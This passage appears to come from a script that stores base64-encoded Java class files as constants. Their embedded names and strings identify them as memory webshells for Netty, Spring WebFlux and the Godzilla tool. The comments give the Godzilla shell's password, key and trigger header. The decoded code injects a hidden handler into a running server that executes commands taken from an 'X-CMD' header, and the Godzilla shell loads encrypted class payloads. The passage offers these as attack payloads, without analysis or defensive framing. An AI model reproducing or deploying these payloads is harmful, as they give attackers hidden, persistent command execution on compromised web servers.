nRleHQ7TGphdmEvbGFuZy9PYmplY3Q7KVYBAANjbWQBAApleGVjUmVzdWx0AQALaHR0cFJlcXVlc3QBAClMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXF1ZXN0OwEAA2N0eAEAKExpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxIYW5kbGVyQ29udGV4dDsHAJ4BAApFeGNlcHRpb25zAQAEc2VuZAEAbShMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7TGphdmEvbGFuZy9TdHJpbmc7TGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXM7KVYBAAdjb250ZXh0AQAGc3RhdHVzAQAwTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXM7AQAIcmVzcG9uc2UBAC5MaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0Z1bGxIdHRwUmVzcG9uc2U7AQAKU291cmNlRmlsZQEAEk5ldHR5TWVtc2hlbGwuamF2YQwAQABBAQAMaW5qZWN0LXN0YXJ0AQAQamF2YS9sYW5nL1RocmVhZAEAD2phdmEvbGFuZy9DbGFzcwwAygDLBwDJDADMAM0BABBqYXZhL2xhbmcvT2JqZWN0DADOAM8HANAMANEA0gwA0wDUDADVANYMANcASAEADk5ldHR5V2ViU2VydmVyBwDIDADYANkMANoA2wcA3AwA0wDdDADeANYBAA9kb09uQ2hhbm5lbEluaXQBAA1OZXR0eU1lbXNoZWxsDADfAOABAA5pbmplY3Qtc3VjY2VzcwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAxpbmplY3QtZXJyb3IHAOEMAGcA4gEAH3JlYWN0b3IubGVmdC5odHRwVHJhZmZpY0hhbmRsZXIBABBtZW1zaGVsbF9oYW5kbGVyBwDjDADkAOUBACdpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cFJlcXVlc3QMAOYA5wEABVgtQ01EBwDoDADYAOkMANMA6gEAEWphdmEvdXRpbC9TY2FubmVyBwDrDADsAO0MAO4A7wcA8AwA8QDyDABAAPMBAAJcQQwA9AD1DAD2AEgHAPcMAPgAeAwAdAB1DAD5AEEHAPoMAPsA/AEAM2lvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9EZWZhdWx0RnVsbEh0dHBSZXNwb25zZQcA/QwA/gD/BwEADAEBAQIHAQMMAQQBBQwAQAEGBwEHBwEIDAEJAQoBABl0ZXh0L3BsYWluOyBjaGFyc2V0PVVURi04DADfAQsMAQwBDQcBDgwBDwEQBwERDAESARMBACVpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxEdXBsZXhIYW5kbGVyAQAncmVhY3Rvci9uZXR0eS9DaGFubmVsUGlwZWxpbmVDb25maWd1cmVyAQAQamF2YS9sYW5nL1N0cmluZwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAXamF2YS9sYW5nL3JlZmxlY3QvQXJyYXkBAAlnZXRMZW5ndGgBABUoTGphdmEvbGFuZy9PYmplY3Q7KUkBAANnZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7SSlMamF2YS9sYW5nL09iamVjdDsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAdnZXROYW1lAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEADWdldFN1cGVyY2xhc3MBAANzZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYBABhpby9uZXR0eS9jaGFubmVsL0NoYW5uZWwBACQoKUxpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxQaXBlbGluZTsBACBpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxQaXBlbGluZQEACWFkZEJlZm9yZQEAaShMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL1N0cmluZztMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlcjspTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbFBpcGVsaW5lOwEAB2hlYWRlcnMBACsoKUxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cEhlYWRlcnM7AQAnaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBIZWFkZXJzAQAVKExqYXZhL2xhbmcvU3RyaW5nOylaAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEALmlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXMBAAJPSwEAD3ByaW50U3RhY2tUcmFjZQEAJmlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEhhbmRsZXJDb250ZXh0AQAPZmlyZUNoYW5uZWxSZWFkAQA8KExqYXZhL2xhbmcvT2JqZWN0OylMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7AQAnaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBWZXJzaW9uAQAISFRUUF8xXzEBAClMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBWZXJzaW9uOwEAGWlvL25ldHR5L3V0aWwvQ2hhcnNldFV0aWwBAAVVVEZfOAEAGkxqYXZhL25pby9jaGFyc2V0L0NoYXJzZXQ7AQAYaW8vbmV0dHkvYnVmZmVyL1VucG9vbGVkAQAMY29waWVkQnVmZmVyAQBNKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0xqYXZhL25pby9jaGFyc2V0L0NoYXJzZXQ7KUxpby9uZXR0eS9idWZmZXIvQnl0ZUJ1ZjsBAHUoTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwVmVyc2lvbjtMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXNwb25zZVN0YXR1cztMaW8vbmV0dHkvYnVmZmVyL0J5dGVCdWY7KVYBACxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvRnVsbEh0dHBSZXNwb25zZQEAK2lvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwSGVhZGVyTmFtZXMBAAxDT05URU5UX1RZUEUBABtMaW8vbmV0dHkvdXRpbC9Bc2NpaVN0cmluZzsBAFUoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7TGphdmEvbGFuZy9PYmplY3Q7KUxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cEhlYWRlcnM7AQANd3JpdGVBbmRGbHVzaAEANChMamF2YS9sYW5nL09iamVjdDspTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZTsBACZpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxGdXR1cmVMaXN0ZW5lcgEABUNMT1NFAQAoTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZUxpc3RlbmVyOwEAHmlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZQEAC2FkZExpc3RlbmVyAQBSKExpby9uZXR0eS91dGlsL2NvbmN1cnJlbnQvR2VuZXJpY0Z1dHVyZUxpc3RlbmVyOylMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsRnV0dXJlOwAhABcAPgABAD8AAAAFAAEAQABBAAEAQgAAAC8AAQABAAAABSq3AAGxAAAAAgBDAAAABgABAAAAFgBEAAAADAABAAAABQBFAEYAAAAJAEcASAABAEIAAAHDAAQACgAAALUSAksSAxIEA70ABbYABkwrBLYABysBA70ACLYACU0DPh0suAAKogCHLB24AAs6BBkExgB1GQS2AAy2AA0SDrYAD5kAZRkEtgAMEhC2ABE6BRkFBLYAEhkFGQS2ABM6BhkGtgAMtgAUEhW2ABE6BxkHBLYAEhkHGQa2ABM6CBkItgAMtgAUtgAUEha2ABE6CRkJBLYAEhkJGQi7ABdZtwAYtgAZEhpLhAMBp/93pwAHTBIcSyqwAAEAAwCsAK8AGwADAEMAAABaABYAAAAYAAMAGgAPABsAFAAcAB4AHgAoAB8ALwAgAEQAIQBQACIAVgAjAF8AJABuACUAdAAmAH0AJwCPACgAlQApAKMAKgCmAB4ArAAvAK8ALQCwAC4AswAwAEQAAABwAAsAUABWAEkASgAFAF8ARwBLAEwABgBuADgATQBKAAcAfQApAE4ATAAIAI8AFwBPAEoACQAvAHcAUABMAAQAIACMAFEAUgADAA8AnQBTAFQAAQAeAI4AVQBMAAIAsAADAFYAVwABAAMAsgBYAFkAAABaAAAAHgAF/wAgAAQHAFsHAFwHAF0BAAD7AIX4AAVCBwBeAwABAF8AYAACAEIAAAB2AAUABQAAABwsuQAdAQA6BBkEEh4SH7sAF1m3ABi5ACAEAFexAAAAAgBDAAAADgADAAAANgAIADgAGwA5AEQAAAA0AAUAAAAcAEUARgAAAAAAHABhAGIAAQAAABwAYwBkAAIAAAAcAGUAZgADAAgAFABnAGgABABpAAAADQMAYQAAAGMAAABlAAAAAQBqAGsAAwBCAAABEAAEAAYAAABhLMEAIZkAVCzAACFOLbkAIgEAEiO2ACSZADctuQAiAQASI7YAJToEuwAmWbgAJxkEtgAotgAptwAqEiu2ACy2AC06BSorGQWyAC63AC+xpwAKOgQZBLYAMCssuQAxAgBXsQABAAwATQBRABsAAwBDAAAAMgAMAAAAPwAHAEAADABCABoAQwAnAEQAQwBGAE0ARwBOAEsAUQBJAFMASgBYAE0AYABOAEQAAABIAAcAJwAnAGwAWQAEAEMACwBtAFkABQBTAAUAVgBXAAQADABMAG4AbwADAAAAYQBFAEYAAAAAAGEAcABxAAEAAABhAFgATAACAFoAAAAPAAP8AE4HAHJCBwBe+gAGAHMAAAAEAAEAGwBpAAAACQIAcAAAAFgAAAACAHQAdQACAEIAAACUAAYABQAAADa7ADJZsgAzLSyyADS4ADW3ADY6BBkEuQA3AQCyADgSObYAOlcrGQS5ADsCALIAPLkAPQIAV7EAAAACAEMAAAASAAQAAABSABQAUwAkAFQANQBVAEQAAAA0AAUAAAA2AEUARgAAAAAANgBwAHEAAQAAADYAdgBZAAIAAAA2AHcAeAADABQAIgB5AHoABABpAAAADQMAcAAAAHYAAAB3AAAAAQB7AAAAAgB8" 17 | 18 | //SpringRequestMappingMemshell 19 | const mem1 = "yv66vgAAADQAjgoABgBLCABMCgAGAE0IADAHAE4HAE8HAFAHAFEKAAUAUgoABwBTBwBUCAAyBwBVBwBWCgAOAEsIAFcKAA4AWAcAWQcAWgoAEgBbCABcCgAIAF0KAAsASwoABwBeCABfBwBgCABhBwBiCgBjAGQKAGMAZQoAZgBnCgAcAGgIAGkKABwAagoAHABrBwBsCQBtAG4KACQAbwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAeTFNwcmluZ1JlcXVlc3RNYXBwaW5nTWVtc2hlbGw7AQAIZG9JbmplY3QBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvU3RyaW5nOwEAFXJlZ2lzdGVySGFuZGxlck1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAOZXhlY3V0ZUNvbW1hbmQBAAtwYXRoUGF0dGVybgEAMkxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi91dGlsL3BhdHRlcm4vUGF0aFBhdHRlcm47AQAYcGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uAQBMTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vUGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uOwEAEnJlcXVlc3RNYXBwaW5nSW5mbwEAQ0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAccmVxdWVzdE1hcHBpbmdIYW5kbGVyTWFwcGluZwEAEkxqYXZhL2xhbmcvT2JqZWN0OwEAA21zZwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEADVN0YWNrTWFwVGFibGUHAE8HAFUHAGABABBNZXRob2RQYXJhbWV0ZXJzAQA9KExqYXZhL2xhbmcvU3RyaW5nOylMb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL1Jlc3BvbnNlRW50aXR5OwEAA2NtZAEACmV4ZWNSZXN1bHQBAApFeGNlcHRpb25zBwBwAQAKU291cmNlRmlsZQEAIVNwcmluZ1JlcXVlc3RNYXBwaW5nTWVtc2hlbGwuamF2YQwAJwAoAQAMaW5qZWN0LXN0YXJ0DABxAHIBAA9qYXZhL2xhbmcvQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQBBb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm8MAHMAdAwAdQB2AQAcU3ByaW5nUmVxdWVzdE1hcHBpbmdNZW1zaGVsbAEAEGphdmEvbGFuZy9TdHJpbmcBADZvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi91dGlsL3BhdHRlcm4vUGF0aFBhdHRlcm5QYXJzZXIBAAIvKgwAdwB4AQBKb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L2NvbmRpdGlvbi9QYXR0ZXJuc1JlcXVlc3RDb25kaXRpb24BADBvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi91dGlsL3BhdHRlcm4vUGF0aFBhdHRlcm4MACcAeQEAAAwAJwB6DAB7AHwBAA5pbmplY3Qtc3VjY2VzcwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAxpbmplY3QtZXJyb3IBABFqYXZhL3V0aWwvU2Nhbm5lcgcAfQwAfgB/DACAAIEHAIIMAIMAhAwAJwCFAQACXEEMAIYAhwwAiACJAQAnb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL1Jlc3BvbnNlRW50aXR5BwCKDACLAIwMACcAjQEAE2phdmEvaW8vSU9FeGNlcHRpb24BAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEABXBhcnNlAQBGKExqYXZhL2xhbmcvU3RyaW5nOylMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvdXRpbC9wYXR0ZXJuL1BhdGhQYXR0ZXJuOwEANihbTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3V0aWwvcGF0dGVybi9QYXRoUGF0dGVybjspVgECJChMamF2YS9sYW5nL1N0cmluZztMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L2NvbmRpdGlvbi9QYXR0ZXJuc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vUmVxdWVzdE1ldGhvZHNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvY29uZGl0aW9uL1BhcmFtc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vSGVhZGVyc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vQ29uc3VtZXNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvY29uZGl0aW9uL1Byb2R1Y2VzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L2NvbmRpdGlvbi9SZXF1ZXN0Q29uZGl0aW9uOylWAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEABG5leHQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAI29yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9IdHRwU3RhdHVzAQACT0sBACVMb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL0h0dHBTdGF0dXM7AQA6KExqYXZhL2xhbmcvT2JqZWN0O0xvcmcvc3ByaW5nZnJhbWV3b3JrL2h0dHAvSHR0cFN0YXR1czspVgAhAAsABgAAAAAAAwABACcAKAABACkAAAAvAAEAAQAAAAUqtwABsQAAAAIAKgAAAAYAAQAAABQAKwAAAAwAAQAAAAUALAAtAAAACQAuAC8AAgApAAABUwAKAAcAAACSEgJMKrYAAxIEBr0ABVkDEgZTWQQSB1NZBRIIU7YACU0sBLYAChILEgwEvQAFWQMSDVO2AAlOuwAOWbcADxIQtgAROgS7ABJZBL0AE1kDGQRTtwAUOgW7AAhZEhUZBQEBAQEBAbcAFjoGLCoGvQAGWQO7AAtZtwAXU1kELVNZBRkGU7YAGFcSGUynAAdNEhtMK7AAAQADAIkAjAAaAAMAKgAAADYADQAAABYAAwAYACAAGQAlABoANgAbAEQAHABWAB0AaQAeAIYAHwCJACIAjAAgAI0AIQCQACMAKwAAAFIACAAgAGkAMAAxAAIANgBTADIAMQADAEQARQAzADQABABWADMANQA2AAUAaQAgADcAOAAGAI0AAwA5ADoAAgAAAJIAOwA8AAAAAwCPAD0APgABAD8AAAATAAL/AIwAAgcAQAcAQQABBwBCAwBDAAAABQEAOwAAAAEAMgBEAAMAKQAAAGgABAADAAAAJrsAHFm4AB0rtgAetgAftwAgEiG2ACK2ACNNuwAkWSyyACW3ACawAAAAAgAqAAAACgACAAAAJwAaACgAKwAAACAAAwAAACYALAAtAAAAAAAmAEUAPgABABoADABGAD4AAgBHAAAABAABAEgAQwAAAAUBAEUAAAABAEkAAAACAEo=" 20 | 21 | // Godzilla 哥斯拉内存马 密码和key pass key header添加sumsec; 1字段 22 | const Godzilla = "yv66vgAAADQB5AoAewD0CAD1CQAhAPYIAH8JACEA9wcA+AoABgD0CgAGAPkKAAYA+goAIQD7CQAhAPwIAP0HAP4IAJwHAP8KAA8BAAoBAQECBwEDCgEBAQQKAQUBBgoBBQEHCgASAQgKAA8BCQgBCgoARgELCACUCgAPAQwKAQ0BAgoBDQEOCgAPAQ8IAJcIARAHAREKACEA9AoBDQESCAETBwEUCAEVBwEWBwEXCgANARgKAA0BGQoAJwEaBwEbCAEcBwCqCQEdAR4KAR0BHwgBIAoBIQEiBwEjCgBGASQKADMBJQoBIQEmCgEhAScIASgKASkBKgoARgErCgEpASwHAS0KASkBLgoAPAEvCgA8ATAKAEYBMQgBMgoADwEzCAE0CgAPATUIATYHATcIATgKAA8BOQgBOggBOwgBPAgBPQgBPgsBPwFACAFBCAFCCwFDAUQHAUULAFIBRggBRwoBSAFJCwFKAUsHAU0HAU4KAFgA9AoAVwFPCQAhAVAKAHkBUQcBUgoAeQFTCgBXAVQKAFcBVQsAXQFWCgFXAVgKAVcBWQoAWAFaBwFbCgBYAVwKACEBXQkAIQFeCgAhAV8JAWABYQoAIQFiCgASAWMKABIA+gcBZAkBZQFmCgFnAWgKAG4BaQsBagFGCQFrAWwIAW0KAUgBbgsBSgFvCQFwAXELAXIBcwcBdAoAeQD0BwF1BwF2AQACeGMBABJMamF2YS9sYW5nL1N0cmluZzsBAARwYXNzAQADbWQ1AQAScmVxdWVzdFRocmVhZExvY2FsAQAXTGphdmEvbGFuZy9UaHJlYWRMb2NhbDsBAAlTaWduYXR1cmUBAAtTaW1wbGVFbnRyeQEADElubmVyQ2xhc3NlcwEAhkxqYXZhL2xhbmcvVGhyZWFkTG9jYWw8TGphdmEvdXRpbC9BYnN0cmFjdE1hcCRTaW1wbGVFbnRyeTxMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXF1ZXN0O0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTs+Oz47AQAHcGF5bG9hZAEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABdMR29kemlsbGFOZXR0eU1lbXNoZWxsOwEACGRvSW5qZWN0AQAUKClMamF2YS9sYW5nL1N0cmluZzsBABVfdmFsJGRpc3Bvc2FibGVTZXJ2ZXIBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAUdmFsJGRpc3Bvc2FibGVTZXJ2ZXIBABJMamF2YS9sYW5nL09iamVjdDsBAAdfY29uZmlnAQAGY29uZmlnAQAQX2RvT25DaGFubmVsSW5pdAEABnRocmVhZAEAAWkBAAFJAQAKZ2V0VGhyZWFkcwEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAHdGhyZWFkcwEAAWUBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAANtc2cBAA1TdGFja01hcFRhYmxlBwE3BwF3BwEDBwEUAQAIZGVmQ2xhc3MBABUoW0IpTGphdmEvbGFuZy9DbGFzczsBAApjbGFzc2J5dGVzAQACW0IBAA51cmxDbGFzc0xvYWRlcgEAGUxqYXZhL25ldC9VUkxDbGFzc0xvYWRlcjsBAAZtZXRob2QBAApFeGNlcHRpb25zAQAQTWV0aG9kUGFyYW1ldGVycwEAAXgBAAcoW0JaKVtCAQABYwEAFUxqYXZheC9jcnlwdG8vQ2lwaGVyOwEAAXMBAAFtAQABWgcBEQcBeAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAdTGphdmEvc2VjdXJpdHkvTWVzc2FnZURpZ2VzdDsBAANyZXQBAAxiYXNlNjRFbmNvZGUBABYoW0IpTGphdmEvbGFuZy9TdHJpbmc7AQAHRW5jb2RlcgEABmJhc2U2NAEAAmJzAQAFdmFsdWUBAAxiYXNlNjREZWNvZGUBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAHZGVjb2RlcgEADW9uQ2hhbm5lbEluaXQBAFcoTHJlYWN0b3IvbmV0dHkvQ29ubmVjdGlvbk9ic2VydmVyO0xpby9uZXR0eS9jaGFubmVsL0NoYW5uZWw7TGphdmEvbmV0L1NvY2tldEFkZHJlc3M7KVYBABJjb25uZWN0aW9uT2JzZXJ2ZXIBACJMcmVhY3Rvci9uZXR0eS9Db25uZWN0aW9uT2JzZXJ2ZXI7AQAHY2hhbm5lbAEAGkxpby9uZXR0eS9jaGFubmVsL0NoYW5uZWw7AQANc29ja2V0QWRkcmVzcwEAGExqYXZhL25ldC9Tb2NrZXRBZGRyZXNzOwEACHBpcGVsaW5lAQAiTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbFBpcGVsaW5lOwEAC2NoYW5uZWxSZWFkAQA9KExpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxIYW5kbGVyQ29udGV4dDtMamF2YS9sYW5nL09iamVjdDspVgEAC2h0dHBSZXF1ZXN0AQApTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVxdWVzdDsBAAtzaW1wbGVFbnRyeQEAI0xqYXZhL3V0aWwvQWJzdHJhY3RNYXAkU2ltcGxlRW50cnk7AQABZgEABmFyck91dAEAH0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTsBAARkYXRhAQALaHR0cENvbnRlbnQBAClMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBDb250ZW50OwEACmNvbnRlbnRCdWYBAAdieXRlQnVmAQAZTGlvL25ldHR5L2J1ZmZlci9CeXRlQnVmOwEABHNpemUBAA5yZXF1ZXN0Q29udGVudAEAA2N0eAEAKExpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxIYW5kbGVyQ29udGV4dDsBABZMb2NhbFZhcmlhYmxlVHlwZVRhYmxlAQBtTGphdmEvdXRpbC9BYnN0cmFjdE1hcCRTaW1wbGVFbnRyeTxMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXF1ZXN0O0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTs+OwcBRQcBUgcBTQcBeQcBTgcBegEABHNlbmQBAF0oTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEhhbmRsZXJDb250ZXh0O1tCTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXM7KVYBAAdjb250ZXh0AQAGc3RhdHVzAQAwTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXM7AQAIcmVzcG9uc2UBAC5MaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0Z1bGxIdHRwUmVzcG9uc2U7AQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAaR29kemlsbGFOZXR0eU1lbXNoZWxsLmphdmEMAIkAigEAEDNjNmUwYjhhOWMxNTIyNGEMAH0AfgwAfwB+AQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIMAXsBfAwBfQCRDACAALkMAIAAfgEADGluamVjdC1zdGFydAEAEGphdmEvbGFuZy9UaHJlYWQBAA9qYXZhL2xhbmcvQ2xhc3MMAX4BfwcBdwwBgAGBAQAQamF2YS9sYW5nL09iamVjdAwBggGDBwGEDAGFAYYMAYcBiAwBiQGKDAGLAJEBAA5OZXR0eVdlYlNlcnZlcgwBjAGNDAGOAY8HAZAMAYcBkQwBkgGKAQAPZG9PbkNoYW5uZWxJbml0AQAVR29kemlsbGFOZXR0eU1lbXNoZWxsDAGTAZQBAA5pbmplY3Qtc3VjY2VzcwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAxpbmplY3QtZXJyb3IBABdqYXZhL25ldC9VUkxDbGFzc0xvYWRlcgEADGphdmEvbmV0L1VSTAwBlQGWDAGXAZgMAIkBmQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzBwGaDAGbAIgMAZwBnQEAA0FFUwcBeAwBngGfAQAfamF2YXgvY3J5cHRvL3NwZWMvU2VjcmV0S2V5U3BlYwwBoAGhDACJAaIMAaMBpAwBpQGmAQADTUQ1BwGnDAGeAagMAakBqgwBqwGsAQAUamF2YS9tYXRoL0JpZ0ludGVnZXIMAa0BoQwAiQGuDAF9Aa8MAbAAkQEAEGphdmEudXRpbC5CYXNlNjQMAbEBsgEACmdldEVuY29kZXIMAbMBfwEADmVuY29kZVRvU3RyaW5nAQAQamF2YS9sYW5nL1N0cmluZwEAFnN1bi5taXNjLkJBU0U2NEVuY29kZXIMAbQBtQEABmVuY29kZQEACmdldERlY29kZXIBAAZkZWNvZGUBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyAQAMZGVjb2RlQnVmZmVyBwG2DADNAbcBAB9yZWFjdG9yLmxlZnQuaHR0c